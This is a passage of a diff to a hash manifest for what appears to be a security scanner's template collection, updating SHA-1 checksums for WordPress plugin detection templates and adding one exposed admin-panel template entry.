http/exposed-panels/umbraco-login.yaml:c0a52155f373e5622c32fa7d1bcbae445f307e87 http/exposed-panels/unauth-xproxy-dashboard.yaml:3e496dc98ceffa3432c0692bba007a7f7ff13973 http/exposed-panels/unauthenticated-frp.yaml:059a007581f93d3e376cb6af12b53e164e057cf2 http/exposed-panels/unifi-panel.yaml:949f113d580ab9bb566a3b2ccca3668e6b61a164 +http/exposed-panels/untangle-admin-login.yaml:a1ed74ceae9fd2e4c6da52bc366a7da290a2bb11 http/exposed-panels/user-control-panel.yaml:50326a70775914bead2c0239ac53725dc488b2a5 http/exposed-panels/v2924-admin-panel.yaml:c35a6c933045f594b324e269592690b236f47aa0 http/exposed-panels/vault-panel.yaml:03707a6899d5697afa8a742aded5e86fe852d057 @@ -5329,214 +5330,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c 